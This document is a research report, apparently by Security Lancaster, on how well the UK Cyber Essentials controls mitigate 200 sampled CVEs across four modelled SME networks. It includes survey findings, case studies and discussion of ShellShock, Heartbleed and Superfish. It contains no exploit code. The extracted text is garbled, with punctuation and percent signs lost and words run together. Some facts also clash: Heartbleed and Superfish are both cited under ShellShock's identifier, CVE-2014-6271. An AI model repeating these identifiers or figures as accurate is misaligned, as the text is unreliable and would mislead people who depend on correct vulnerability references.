Two-hundred randomly selected internet-originating vulnerabilities are analysed formitigation across four SME networks with andwithout the Cyber Essentials controls in placeA network built from survey responses is usedto assess the typicality of the SME networksas well as to develop a broader understandingof typical SME network configurations andsecurity-practice
The aggregated results show that withoutthe Cyber Essentials controls none of the
attacks assessed were mitigated on anynetwork This more than anything elseshould be understood by SMEs taking noaction to combat cyber threats simply isnrsquot anoption
With the CE tools more than 99of the vulnerabilities in SMEs interviewedwere mitigated as shown in the figure belowwhich depicts the aggregated results across allcases studied The approx 13 of exploitsonly partially mitigated rely on hardware orsoftware vendors to release patches succinctlyand effectively to combat any vulnerabilities
Once the vendor has released a security
patch the Patch Management componentof Cyber Essentials ensures that the systemreturns to a secure state However up until apatch is released there remains a vulnerabilityin the network For this reason it shouldbe stressed for SMEs to frequently considerwhat services or software is installed whetherit is necessary and whether a more securealternative is available
The few vulnerabilities not mitigated byCyber Essentials are as such because offundamental hard-coded flaws in hardware orsoftware that are unable to be updated orpatched to a secure state
Figure 1 Cyber Essentials Aggregated Vulnerability Mitigation Results
Recommendations
Although the Cyber Essentials tools havebeen shown to successfully mitigate thevast majority of the attacks assessed it isimportant to note that only rsquocommodity-levelrsquoexploits (as defined by the Cyber EssentialsFramework)[10] viable for a remote attackhave been considered
The scope of this report does notaddress vulnerability to insider threats socialengineering physically proximate attackersor other targeted-attacks it may berecommended that a follow-up study with awider scope be carried out to investigate therisks from other forms of attack with the useof Cyber Essentials
The rsquo10 Steps to Cyber Securityrsquo reportpublished by CESG[2] highlights that inorder to maximise the security of a networkit is essential to not only consider theprevention of attacks with the use of toolsbut to also ensure that all employees areadequately educated in network securityand treated with scrutiny through accesslogs and data-loss-prevention schemes inorder to achieve a secure business in the faceof potential local and remote attacks Wewould recommend that especially for largerorganisations additional security measuressuch as these be put in place
For hardware or software identified as
inherently flawed resulting in unmitigatablevulnerabilities our recommendation is thatthese pieces of software or hardware beavoided at all costs when developing an SMEnetwork In addition a global list of un-safe products could be collectively developedand made publicly available This relates toour last recommendation of integrating CyberEssentials further with collective securityapproaches such as The Cyber-securityInformation Sharing Partnership (CiSP)[4]These approaches keep SMEs with the latestinformation about vulnerabilities and othercyber-threat information
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 2 of 28
IntroductionC
yber Essentials was introduced asa government funded scheme firstpublished in April 2014 as an interest
of national security to bolster UK securityin cyberspace The Cyber Essentialsscheme was developed in collaboration withthe Information Assurance for Small andMedium Enterprises (IASME) consortiumthe Information Security Forum (ISF) andthe British Standards Institution (BSI) as aset of basic technical security controls fororganisations to utilize for the mitigation ofthe lsquobottom 80rsquo of remote cyber-threats[3]
The scheme built to provide animplementable of the 10-steps to Cyber-Security[1] was released as part of the2011 UK Cyber Security Strategy[16] andis being backed by the UK government asan organisational standard Thus far it hasbeen adopted by several large organisationsincluding Vodafone Hewlett-Packard (HP)BAE Systems Virgin Media and Barclays[5]
The Cyber Essentials accreditation hasbeen made mandatory from October 1st
2014 for all suppliers of government contractsinvolving ldquothe handling of sensitive andpersonal information and provision of certaintechnical products and servicesrdquo[17]
The Cyber Essentials security controls aresummarised as follows[7]
Firewalls and GatewaysThese are devices designed to preventunauthorised access to or from privatenetworks but good setup of thesedevices either in hardware or softwareform is important for them to be fullyeffective
Secure configurationEnsuring that systems are configured inthe most secure way for the needs ofthe organisation
Access controlEnsuring only those who should haveaccess to systems to have access and atthe appropriate level
Malware protectionEnsuring that virus and malwareprotection is installed and is it up todate
Patch managementEnsuring the latest supported version ofapplications is used and all the necessarypatches supplied by the vendor beenapplied
Figure 2 Cyber Essentials Security Tools
The intended scope of Cyber Essentialsis outlined in the Cyber Essentials SchemeAssurance Framework[10] This states thatthe CE controls are considered as applicableto all sizes of Enterprise as a base level ofprotection against cyber-attacks upon whichindividual organisations may build on withfurther tools network devices or protocols forthe mitigation of targeted attacks The CEScheme is clear in its inclusion of lsquoBring your
own Devicersquo network setups to scope as wellas Cloud-based services and off-the-shelf webapplications Bespoke IT systems such as inmanufacturing and retail are applicable to CEbut hold additional vulnerabilities due to theirnature that are not to be considered
Aims
The purpose of this report is to investigatethe effectiveness of the Cyber Essentialscontrols in mitigating lsquocommodity-levelrsquoattacks attempting to exploit vulnerabilitiesin Small and Medium Enterprise (SME)networks
A commodity-level attack has been definedby CESG[8] as
Any unauthenticated remote attackexploiting a known vulnerability withthe use of tools and techniques openlyavailable for download or purchaseon the internet - and that do notrequire extensive specialist knowledge toconduct1
To effectively assess Cyber Essentials itis firstly necessary to understand the typicalnetwork configurations of SMEs Interviewswith SMEs were carried out to build abstractednetwork models and a survey has beenconducted to build a broader picture of SMEnetwork deployments The survey resultswill help to develop our understanding ofcurrent security practice and cyber-awarenessas well as to build a general-case SME networkwith which to analyse the typicality of SMEsinterviewed
The networks modelled from collected dataare to be considered with and without the useof the Cyber Essentials security controls tocomparatively establish the protection grantedwith the adoption of the CE scheme
1This includes attacks utilising pen-testing software such as Metasploit Kali and the Poison Ivy remote access tool which are capable of scanning network nodes for publiclyknown vulnerabilities in the operating system applications or services in use
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 3 of 28
MethodologyT
he scheme of work for this report has beensplit into the following sections
bull Collection of data through interviews anda survey regarding the implementationand deployment of networks in real-worldSMEs for use in designing paper-modelsto be analysed
bull Composition of a list of suitablevulnerabilities that contains applicablemethods by which remote attackers canexploit commodity-level attacks
bull Assessment of vulnerability mitigation forSME networks with and without the useof the CE Tools
Data Collection
In order to analyse the effectiveness of theCyber Essentials Security Tools four real-world SME networks have been modelledModels have been composed using informationgathered in interviews and abstracted toreduce redundant complexity and removeany linkage with the SME In addition ageneralisable SME model was composed fromSurvey responses to serve as a baselinenetwork from which all SME networks maybe adapted
Interviews
The interviews were composed with the goalof firstly understanding the layout or topologyof the network deployed by an SME To thenbuild on the network configuration it wasimportant to understand how the network isused - where remote connections take placehow local services are utilised and how anattacker sees the network Hardware vendorsoperating systems and version numbers wereconsidered to build a greater understanding ofthe network
Additional questions were posed toexamine the current state of security on thenetwork such as any security accreditationsprevious breaches and how often updates arerolled out
Survey
The Survey was constructed as a stripped-down questionnaire representing the essenceof the questions posed in the Interviews Thisincluded details of the number of workstationsat the SME to gauge its size the localand remote services available the operatingsystems used on the service providers andworkstations the current security policies in
place and the respondentsrsquo awareness of theCE Scheme
Two surveys were sent out one to a securelist of SMEs in the NW Security Cluster[9]and another publicly to closed groups ofsecurity-interested SME representatives
Vulnerabilities
A total of 200 random vulnerabilitieshave been equally taken from two annualvulnerability lists of CVE-2013 and CVE-2014 published by Mitre2 Any vulnerabilitiesfound to be unsuitable for analysis have beenreplaced by a new candidate
In this report we use the Mitreorganisation definition for a vulnerabilitywhich they state as
An information securityldquovulnerabilityrdquo is a mistake in softwarethat can be directly used by ahacker to gain access to a system ornetwork CVE considers a mistake avulnerability if it allows an attackerto use it to violate a reasonablesecurity policy for that system (thisexcludes entirely ldquoopenrdquo security
2CVE is sponsored by US-CERT in the office of Cybersecurity and Communications at the US Department of Homeland Security
Figure 3 Methodology for Assessing Cyber Essentials
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 4 of 28
policies in which all users are trustedor where there is no consideration ofrisk to the system)
(As shown on Mitreorgrsquos Terminologypage[6] in March rsquo15)
To warrant a CVE entry into the Mitrelist individual vulnerabilities must place theaffected system (or systems) in to a statewhich either
bull allows an attacker to executecommands as another user
bull allows an attacker to access data that iscontrary to the specified access restrictionsfor that data
bull allows an attacker to pose as anotherentity
bull allows an attacker to conduct a denialof service
High-Profile Vulnerabilities
Three specific high-profile vulnerabilities werealso taken in addition to the randomly chosen200 and have been assessed to what extentthe Cyber Essentials scheme would affect thevulnerability of SMEs in these situations
Additionally the applicability of thesevulnerabilities to the SME networks we studiedis included along with the respective potentialto harm operations
Mitigation Assessment
The Vulnerabilities chosen have beenqualitatively assessed for mitigation withand without the use of the Cyber Essentialscontrols The process considers each
component of the controls in asserting whethereach vulnerability would be mitigated partiallymitigated or not mitigated The results aredouble-vetted to ensure correctness
For each of the SMEs Interviewed each ofthe vulnerabilities are assessed for applicabilityto that network configuration In cases wherethe vulnerability is for a specific model ofhardware the network is deemed applicable ifit uses a like-product from the same vendorIn cases where the vulnerability is in softwareonly those referencing software in-use or likelyin-use (based on the SMErsquos practice) aredeemed applicable to the network
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 5 of 28
AnalysisT
he analysis of data collected has beensplit into sections firstly each of thevulnerabilities have been assessed to
ascertain their mitigation with and withoutthe use of the Cyber Essentials controlsthis supposes a case where any software orhardware source of a vulnerability is in use (iea worst-case fully inclusive assessment)
What follows is an analysis into theinformation gathered from interviews FourSMEs from distinct industries are detailed inphysical infrastructure and service usage aswell as current user access policies and existingsecurity measures in place A summary of themitigation results in vulnerabilities in softwareand hardware used for each SME networkconfiguration is included
The full table for the applicability of allCVE vulnerabilities to each of the networkstructures can be found in the CVE Detailssection on page 19
Finally the data collected from the surveyis analysed and used to develop a general-case network model the SME networks arecompared to this to better understand thenuances of each market sector as well theoverall typical configuration of SMEs
Full Vulnerabilities Assessment
Of the entire list of 200 vulnerabilities from2013 and 2014 deemed as applicable tothe study and chosen for analysis 131vulnerabilities were mitigated with the useof the Cyber Essentials Security Tools 61vulnerabilities were partially mitigated and 8were not mitigated
Figure 4 Percentage of Full Vulnerabilities ListMitigated
Partially Mitigated 59 of the 61 CVEsjudged as partially mitigated are as suchbecause they rely of patches from third-party software or hardware vendors butthat will be mitigated once a security fixhas been released Despite any level ofsecurity tools being deployed on a network thesecurity involved in using third party softwareunfortunately relies on the vendorrsquos ability toidentify potential areas of risk as well asto quickly respond to security breaches as
they become apparent with the release ofpatches All software installed on an SMEnetwork should be periodically reviewed todecide whether it is necessary - or if thereare more suitable and potentially more securesolutions available
The other two partially mitigatedvulnerabilities rely on website blacklistingcombined with avoiding vulnerable webbrowser software A secure configurationwithout such a browser would mitigate thisvulnerability but as in the Web DevelopmentSME case study it may not always be possibleto avoid the use of a specific software pieceIn a case as this website blacklisting is theonly defence against the vulnerabilities
Not Mitigated - Secure ConfigurationSome vulnerabilities have been found to beunmitigatable using the CE controls in each ofthe found cases this is due to inherent flaws ina hardware device or software that can not befixed by a security patch or firmware update
For these devices that are fundamentallyflawed from a cyber-security stand-point itcan be that no level of security tools on top ofthe network can aid in mitigation - rather thehardware should be replaced to ensure networksecurity It may be possible for a public list ofall such devices to be developed as part of thegovernment cyber-security scheme - to serveas a device-blacklist for SMEs
Case Studies
Four SMEs were interviewed to build paper-models upon which the Cyber Essentialscontrols may be assessed Some detail on thephysical structure usage and existing securityof each network is provided
bull SME Network One represents a financespecialist SME using a combination ofexternally managed services for bankingin addition to internal remotely accessibleinternal services for employees
bull SME Network Two represents a specialistSME utilizing an off-site remotely managedserver for administrator services and cloud-based services for employees
bull SME Network Three represents a webservices SME that accesses client serversfrequently and utilises cloud-basedservices daily
bull SME Network Four represents a hospitalityservices provider with a very smallcompany network co-located with a verylarge guest network component where allof the services are remotely managed andlocated
SME Network One - Finance Sector
Physical Infrastructure The companyinterviewed comprised around 20 employeeslocated at 3 sites nationally
Remote workers connect over normalinternet connections both residential andcommercial and use both VPN and non-VPNtraffic (specifically web traffic on port 80) toaccess services supplied by the company
Figure 5 SME-1 Network
The hardware at the head office (wherethe interview was carried out) consists ofequipment by 3Com Draytek BT and Heuwaifor infrastructure components Employees usea range of machines bought between 2011and 2014 comprising a mix of Dell and LenovoPCs
As most of the infrastructure is passive(most of the traffic is handled by a single3Com BaseT-1000 switch) the firmware onthe equipment is unchanged from purchase ifany firmware is present at all
Services At the head office site a WindowsFile Server (SAMBA) server provides local filesharing and allows remote users to accessthe same files via VPN The mail servera Microsoft Exchange Server is an off-sitedeployment managed by an external companybut is a dedicated server for only this company
Additionally a web service and databaseserver is run from a server at the site Thisprovides both local HTTP access to thedatabase it runs as well as having firewallrules put in place to allow external access tothe same system for off-site employees
Numerous other pieces of banking softwareare run on bank-owned remote servers andare accessed and secured via combinationsof smart cards and PIN entry devices alsosupplied by the banks
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 6 of 28
User Access Employees are permitted toaccess the internet from both their individualworkstations and additional devices such assmart phones (although technically this is notpermitted by policy but this policy is notstrictly enforced) Internet access is howeverslightly filtered with access to Facebook beingblocked by the router
Access logs for any network operations arenot created and any machine in the office canaccess the network with no isolated islands
User accounts can be migrated betweenmachines via a Domain Controller but inpractice this is unlikely to actually happenwith users generally using their own machines
Operating systems Locally everything isWindows 7 the remote site uses Windows7 2 remote machines are Windows 81
Mitigation of applicable vulnerabilities Ofthe 200 listed vulnerabilities 119 wereapplicable to the first SME network
Figure 6 SME-1 Vulnerability Mitigation
Because much of this SMEs operationsare done via browser-based interfaces to otherfinancial companies (such as banks) it placesthem in the firing line for a large number ofthe browser based attacks Furthermore assome banks require specific browser versionsfor their interfaces to work they end upwith several different browsers with severalversions of each to cover all their requirementsopening them up multiple times to browser-based vectors
Additionally the heavy use of SSL-basedcommunication places them in a positionwhere any SSL vulnerabilities affect them too
SME Network Two - Specialist Group
Physical Infrastructure The second SMEparticipant employs 20-25 based acrossmultiple offices in one building
Employees may bring their own devices oruse a workstation provided Workstations areconnected to one of four switches via Ethernetand share a virtual LAN with other employeedevices An off-site server containing sensitivedata is accessible only to administrators viaSSH
Network Equipment includes an externalDell PowerEdge Server four TPLink SwitchAccess Points and a TPLink DHCP Router
Figure 7 SME-2 Network
Services Employee devices sharing thenetwork can use Windows Folder SharingEmployee devices include OSs OS XWindows XP Windows 7 amp Windows 8 withauto-updates enabled
Some Employee use of VPN to connectto another network for a data service Allother services are provided by cloud serversvia HTTPS Email Files amp Database as wellas management tools these are used daily
User Access Employees have no restrictionon their internet access and may use theirown equipment Administrators often accessa remote server database and file store actingas a web server Guests may access a separateWi-Fi network through the same access pointsas other office workers but do not sharethe same virtual LAN as employees Wi-Fiaccess logs are gathered but no other useractivity Employees can access the networkfrom any machine but the SMErsquos policy isthat all machines should have anti-malwareand strong passwords which are recommendedto be changed periodically with the employeemachines configured to automatically lockafter a period of inactivity
Mitigation of applicable vulnerabilitiesOf the 200 listed vulnerabilities 79 wereapplicable to the second SME network
Figure 8 SME-2 Vulnerability Mitigation
The specialist SME had the fewest overallpotential vulnerabilities largely owed toa higher reliance on cloud-based servicesAlthough this reduces the risk from inherentvulnerability in a network responsibility ishanded onto the service provider chosen Acertified and reputable cloud services providershould thus be sought to ensure protectionthrough the entire chain
SME Network Three - Web Development
Physical Infrastructure SME-3 employs 10workers based in one building
Employees are restricted from using theirown devices unless it is validated by thecompany head - in which case no others mayshare that device Workstations are connectedto one switch via Ethernet and share a virtualLAN with other employee devices
Network Equipment includes an externalDell PowerEdge Server one TPLink SwitchAccess Point and a TPLink DHCP Router
Figure 9 SME-3 Network
Services Employee devices sharing thenetwork can use Windows Folder SharingEmployee devices include OSs OS XWindows 7 amp Windows 8 with auto-updatesenabled
All services are provided by cloud serversvia HTTPS Email Files amp Database as wellas management tools these are used daily
User Access Employees have no restrictionon their internet access and commonly useall major browsers for compatibility testing
Guests are not permitted on the networkbut may join a rsquoguestrsquo network through thesame access points with a mobile device Wi-Fi logs and Cloud Service Access logs aregathered and actively monitored Employeescan access the network from a validatedmachine but the SMErsquos policy is thatall machines should have anti-malware and
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 7 of 28
strong passwords which are recommended tobe changed periodically with the employeemachines configured to automatically lockafter a period of inactivity
Mitigation of applicable vulnerabilities Ofthe 200 listed vulnerabilities 116 wereapplicable to the second SME network
Figure 10 SME-3 Vulnerability Mitigation
The requirement for web developmentSMEs to operate across multiple web browserson various versions to test and build acustomerrsquos website means that the networkaccumulates all vulnerabilities in web browsersAs this is a specialist case a recommendationfor web development organisations could beto use one up-to-date browser for general useA bespoke policy may then be put in place
When working on alternative browsersemployees should only access client pageswhere the developer has control of the web-content
SME Network Four - Hotel Services
Figure 11 SME-4 Network
Physical Infrastructure This company islocated at a single site and has equipmentcomposed of a single desktop PC and 2company laptops running on a ADSL router -this same router also provides the internetconnection for the guests An alternativerouter is available as a manual fall-backconnection to the internet but is availableonly to company equipment
The guest network is split from the officenetwork through secondary access point namesfiltering traffic in to a separate VLAN internalto the router
Services No local servers are present toprovide any service to employees or guestson the network
File storage is provided through on-lineservices including Dropbox and Skydrive Astandalone web-server owned and managedexternally runs the company website andbookings are managed via a globally accessiblewebsite
All the services are accessed with SSLsecured connections (HTTPS mainly)
User Access User access is not mediated inany way and any site can be accessed fromany computer Guests have no restrictionsplaced on their network usage either
Operating systems The company uses iOSfor their mobile devices and Windows 81 forthe office desktop and laptop PCs Guests canbring their own equipment so will be a mixof all operating systems currently availableincluding Windows Linux Mac and others
Existing Security Measures Beyond therouterrsquos separation between the guest andoffice networks no other network securitymeasures are in place The office PCs dohave automatic patch installation configuredhowever and have the Kaspersky antivirussuite installed
Mitigation of applicable vulnerabilities Ofthe 200 listed vulnerabilities 103 wereapplicable to the second SME network
Figure 12 SME-4 Vulnerability Mitigation
Similarly to SME 1 SME 4 requires theuse of web browsers for bookings and receptionof guests so enables a wide variety of attackvectors through the web
Thankfully the services and servers theyconnect to are run by larger corporationswhich will hopefully have implemented at leastCyber Essentials-grade security and protectionso the actual risks should be minimal
For the purposes of this report howeverwe assume that if this company has notimplemented Cyber Essentials then theservices they use must also not have leavingthem open to attack
Survey Responses
Data gathered from survey responses affordsa much broader look at the typical networkdeployments and practice in SMEs The fullresults from 17 participants may be found inthe Survey Responses section on page 27
Physical Infrastructure The majority ofrespondents belong to SMEs with 0-9workstations on site this is related to the sizeof an organisation - and could be consideredrepresentative of businesses across the UK
Services Local - File Email Database andDomain Servers are the most common localservice providers all present in more than 13rdof SMEs Remote - Email web hosting andfile-sharing are the most common servicesprovided remotely
User Access More than half of SMEs permitemployeersquos own devices to be used in theworkplace for organisations such as these it isimportant to ensure that employee machinesreceive the same level of protection as therest of the work network - as one vulnerablemachine allows vulnerability into the wholecompany
Existing Security Measures Of the surveyrespondents most SMEs have a firewallpassword policy and data-loss preventionscheme in place These are the mostcommon security measures in place forthe SMEs contacted below this is accesscontrol malware protection and finally patchmanagement which is present in a little overhalf of organisations
Almost two-thirds of survey participantswere previously aware of Cyber Essentials
Survey Respondents Network
The network built from Survey Respondentsdata considers the overall response in order tobuild a network easily adaptable to match thatof the majority of SME network configurations
Locally Email and File servers havebeen represented with domain controllercapabilities represented in a network ADSLRouter Remotely a web server is depictedbut remote services may also include databaseusage email and other web services
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 8 of 28
Figure 13 Adaptable Survey-Response Network
Typicality of Case-Study SMEs
Within the Survey Respondents networkaspects of each of the interviewed SMEnetworks is apparent
The Finance SME network shares a localfile server as sensitive information needs tobe kept and processed by the organisationAny SME handling sensitive information willbe likely to strongly consider using local fileservers
The Specialist SME shares with the surveyrespondents data itrsquos use of SSH to connectremotely to services SSH is an important toolfor accessing sensitive date while at home or
data that is stored remotely the workplace
The Web Development SME requiresemployees to connect to many web serversremotely the survey respondents match thiscase with the use of external web-hostingservices That being said in the general-casethis server is more likely to be the SMErsquos ownweb-hosting solution rather than a clients
The Hotel Services SME represents avery basic local network using only cloud-based services remotely This is becoming anincreasingly popular trend for SMEs as cloud-services are often easier to set up and cheaperto maintain This is also representative ofmany SMEs with little-to-no online presence
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 9 of 28
Analysis of CyberEssentials on High ProfileVulnerabilitiesT
he following sections detail three ofthe high-profile vulnerabilities to hit thepopular media in late 2014 to early 2015
These are of particular note as while they maynot be the most damaging of attack vectors(although some are very serious) they havecaught the attention of the public and SMEswould be under pressure to ensure that theywere protected
With this in mind we analyse how effectivethe Cyber Essentials security controls are attackling these high-profile vulnerabilities
ldquoShellShockrdquo
Also known by the name ldquoBashDoorrdquoShellshock hit the news as it attacked theLinux server environment and did so in aparticularly effective manner
GNU Bash through 43 processestrailing strings after functiondefinitions in the values ofenvironment variables which allowsremote attackers to execute arbitrarycode via a crafted environment asdemonstrated by vectors involvingthe ForceCommand feature inOpenSSH sshd the mod cgi andmod cgid modules in the ApacheHTTP Server scripts executedby unspecified DHCP clients andother situations in which setting theenvironment occurs across a privilegeboundary from Bash execution akaldquoShellShockrdquo NOTE the originalfix for this issue was incorrect CVE-2014-7169 has been assigned tocover the vulnerability that is stillpresent after the incorrect fix
CVE-2014-6271[13]
The exploit allowed attackers to directlyexecute arbitrary shell commands on acompromised system by altering environmentvariables However the bug was not enoughby itself to actually enable attackers tocompromise a system but allowed accessvia other services While the exploit is onlyeffective if the bash environment can bealtered the results can be devastating asit lays bare the entire system to many otherforms of attack
The threat was particularly insidious forSMEs who used LinuxUnix based servers forservices mail servers as an example as theywould potentially have no idea that they hadbeen compromised
ldquoHeartbleedrdquo
Appearing in April 2014 the CVE-2014-6271(aka rdquoHeartbleedrdquo) bug allowed attackers todirectly read the active memory of a targetmachine through buffer over-read This thenallowed attackers to access private credentials(or indeed anything else) in the RAM of thetarget
As described in the original CVE report
The (1) TLS and (2) DTLSimplementations in OpenSSL 101before 101g do not properlyhandle Heartbeat Extension packetswhich allows remote attackers toobtain sensitive information fromprocess memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading privatekeys related to d1 bothc andt1 libc aka the Heartbleed bug
CVE-2014-6271[12]
As OpenSSL is a core part of manyapplications and services both in the openand closed source world this vulnerabilityhad the potential to damage a huge numberof systems At the time of release varioussources (including for example Netcraft[15])that up to 17 of trusted SSL-certified serverswere vulnerable to the attack
Depending on how the SME in questionoperates the threat this particular CVE posed(and indeed still poses with still as yetto be updated servers still online with thevulnerability) is difficult to discern Obviouslythe vulnerability is serious but the ability ofindividual SMEs to detect and correct this flawwill vary greatly depending on the individualdeployments
Larger companies with their ownLinuxUnix servers may have be able to deploythe patched OpenSSL version as soon as thepatch was available but smaller businesses
or those with more cloud-based services maynot have access to the software running onthe servers they use and may be at the mercyof the respective operators to implement thefix Because of this patch management onlypartially remedies this vulnerability and otherprotection methods from the Cyber Essentialsguidelines such as securing configurations orcontrolling access will have unknown effects
It is vulnerabilities such as this that posethe greatest threat to SME networks as themethods to fix the issue are often outside thecontrol of the company potentially leavingthem vulnerable far longer than one wouldexpect
ldquoSuperfishrdquo
The SDK for Komodia Redirectorwith SSL Digestor as usedin Lavasoft Ad-Aware WebCompanion 118851766 and Ad-Aware AdBlocker (alpha) 13691Qustodio for Windows AtomSecurity Inc StaffCop 58 andother products uses the sameX509 certificate private key fora root CA certificate across differentcustomersrsquo installations whichmakes it easier for man-in-the-middleattackers to spoof SSL servers byleveraging knowledge of this keyas originally reported for SuperfishVisualDiscovery on certain LenovoNotebook laptop products
CVE-2014-6271[14]
This vulnerability is particularly interestingas the software causing the issue waseffectively brokered by a trusted hardwarevendor namely Lenovo Because the issuewas part of the lsquonormal configurationrsquo forthe equipment it remained undetected fora long time and hints that there may befurther breaches in security as yet undiscoveredin both Lenovo and other manufacturerrsquosequipment
The vector is through the SuperFishsoftware essentially breaking the chain of trustfor SSL certificates by installing a self-signingcertificate in to the list of trusted certificateson the host machine This allows an attackerto simply sign their own code via the same
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 10 of 28
certificate which itself can be easily gatheredfrom any other machine running SuperFishand they have full access to any SSL-securedconnection from the target machine
Thankfully while the risks to users andSMEs was high the fix is a simple one-timerun of a removal tool provided by Lenovothemselves[11] and is mitigated fully throughthe Cyber Essentials patch managementadvice
Threat Analysis
ShellShock Without Cyber Essentials inplace SME 1 and 2 would be at risk fromlsquoShellshock as they both operate UnixLinuxbased systems that would require patching toplug the security issue The extent at whichSMEs 3 and 4 are vulnerable to this issue isunclear as their large dependency on outside
service providers leaves them in a positionwhere they are both unable to determine theirvulnerability and additionally unable to remedyit
With Cyber essentials SME 1 and 2 wouldbe fully protected and it is likely that SME3 and 4 are also protected if the externalproviders also use a Cyber Essentials or othersecurity and patching schemes
Heartbleed The lsquoHeartbleedrsquo bug is anothervulnerability that without Cyber Essentialsguidelines being followed would have laidcompanies external-facing services open tomalicious attackers
In all cases however each SME can befully protected with a combination of patchmanagement firewalling and application ofaccess controls from the Cyber Essentialsguidelines
SuperFish All of the SMEs we interviewedcould be exceedingly vulnerable to thelsquoSuperfishrsquo issue without Cyber Essentialsas much of their operations revolve aroundSSL encrypted communications A break inthe chain-of-trust for their certificates wouldallow an attacker to man-in-the-middle theircommunications
Normal system updates would have failedto remedy the situation as the fix providedby Lenovo consisted of a tool to be runin addition to the normal operating systempatches It is further debatable how effectiveCyber Essentials patch management wouldhave been in plugging this vulnerability as itwould require that the administrators be awareof the issue and know of the patch rather thansimply following lsquonormalrsquo patching guidelinesAssuming that the persons responsible for theequipment are aware of the issue howeverthen Cyber Essentials patch management fullymitigates this issue
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 11 of 28
ConclusionsT
he Cyber Essentials Security Tools havebeen shown to mitigate or to mitigateas soon as a patch is released all
vulnerabilities from remote attackers that donot exploit fundamentally insecure software orhardware Of the two-hundred vulnerabilitiescollected eight exploits were not able tobe resolved with the deployment of securitypatches for vulnerabilities such as these theonly mitigation available is simply not to installthe compromised systems To help preventdeployments being susceptible to attacks onfaulty systems it may be recommended that ablacklist of such items is composed for publicreference
Scope It is important to consider that thescope of this study covers only internet-basedcommodity-level attacks and although theCyber Essentials tools performs very well inmitigating this it does not represent fullsecurity There is an increasingly identifiedrisk from insiders that also requires attentionnot least malicious acts but also from usersunknowingly compromising security
The SMEs interviewed representorganisations from a range of market sectorsin web development and online presencespecialist scientific services the hospitalityindustry and finance
Additional Tools
The 10 Steps to Cyber Security[2] identifiesadditional security measures that supportthe Cyber Essentials Scheme well todeliver additional security through indirectmeasures such as User Education Awarenessalong with Network and Systems MonitoringThese additional measures would serve tobolster cyber security through fortifyingeach employee of the SME with necessaryknowledge on safe practice itrsquos importanceand some technical basic understanding -just as they may be versed in environmentalawareness Network and Systems Monitoringallows for remote user logins as well as fileaccess and activity to be logged For verysmall networks this may be currently infeasibleas the extra manpower or finances required for
such a system are costly However for largeorganisations additional monitoring capabilityshould be explored as a future extension tothe Cyber Essentials not just to identify andmitigate malicious action for more bespokeand sophisticated attacks than those reportedon but to also aid in providing evidence forany potential cyber-crime investigations
There exist some collective approaches toimproving cyber-security a notable example ofthis is The Cyber-security Information SharingPartnership (CiSP)[4] The partnership aimsto benefit all members by providing real-time updates on issues of cyber-securityand discovered vulnerabilities as well asbest-practice guides and other cyber-threatinformation It would be beneficial formore organisations to belong to cyber-securitycollectives like this creating networks ofinformed individuals working together to tacklecyber-crime This would be particularly usefulto quickly identify potential vulnerabilitiesand possible patches which as shown inthis report is critical for the CE patchmanagement security control to fully mitigaterelated vulnerabilities
An important note to be made is towardthe security of business affiliates and serviceproviders Even if an SME has CyberEssentials in place any use of cloud-servicesrelies on the vendorrsquos security controls forthreat mitigation In other words cloud-email accounting and any other cloud-basedor remote services are only as secure as theservice provider makes it In general cloud-providers should be holding a high level ofscrutiny to their security practice and shouldbe encouraged to certify their protectionHewlett-Packard(HP) has taken this furtherand has begun to strengthen itrsquos entire supply-chain ( 600 SMEs) with the Cyber Essentialsaccreditation This provides protection acrossthe entirety of Hewlett Packardrsquos operationsas well as itrsquos affiliates This should be agoal for organisations of all sizes minimisingthe risk from cyber-threats by ensuring alltrading partners uphold the same high levelsof security
Cyber Essentials Controls
Of the five current Cyber Essentials ControlsPatch Management was considered to aid inthe mitigation of the highest proportion ofremote attacks (875 ) counter-intuitivelythe Survey responses had patch managementranked last in use for SMEs The highestcurrently used controls could be seen asthose providing the most intuitive or easilyunderstood protection Data loss preventionstrong passwords and firewall While patchmanagement isnrsquot necessarily understood byindividuals as a tool to greatly improve cyber-security
Anti-Malware was useful in mitigating theleast (10 ) vulnerabilities It is howeverimportant to note that Anti-Malware is largelythe only security tool that may routinely scanthe network hardware and software as wellas any items downloaded from the internetor as email attachments This serves as alast line of defence and as such is vital to anorganisationrsquos cyber-safety
Recommendations
To further improve cyber-security across theUK we recommend that
1 Collective approaches to cyber securityshould be further encouraged Inparticular a governmentalcollectiveapproach to identifying inherently flawedproducts should be developed Thiscould be in addition to or as an extensionto current initiatives like CiSP whichcan make a difference in detecting andreacting on potential vulnerabilities in atimely manner
2 Further research into the mitigation ofother cyber-threats is carried out toexplore the risk from insider-threats andtargeted attacks
3 Further employee education is stronglyencouraged specially to be able totackle these other types of attacksmentioned above which were not underthe scope of this report
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 12 of 28
References[1] Centre for the Protection of
National Infrastructure CESGCabinet Office InnovationDepartment for Business andSkills Cyber security guidance forbusiness httpswwwgovuk
governmentpublicationscyber-
risk-management-a-board-level-
responsibility September 2012
[2] Centre for the Protection ofNational Infrastructure CESGCabinet Office and Innovation amp SkillsDepartment for Business 10 stepsto cyber security httpswwwgov
ukgovernmentpublicationscyber-
risk-management-a-board-level-
responsibility September 2012
[3] Innovation CESG UK Trade ampInvestment Prime Ministerrsquos Office10 Downing Street Centre for theProtection of National InfrastructureGovernment CommunicationsHeadquaters UK Trade amp Departmentfor Business and Skills Cyber securityboost for uk firms httpswww
govukgovernmentnewscyber-
security-boost-for-uk-firmsJanuary 2015
[4] Centre for the Protection ofNational Infrastructure CiSPCERT-UK and Innovation amp SkillsDepartment for Business Cyber-securityinformation sharing partnership (cisp)httpswwwcertgovukcispMarch 2013
[5] CREST Cyber essentialscertified companies http
wwwcyberessentialsorglistMarch 2015
[6] CVEMitreorg Terminology - mitreorghttpcvemitreorgabout
terminologyhtml
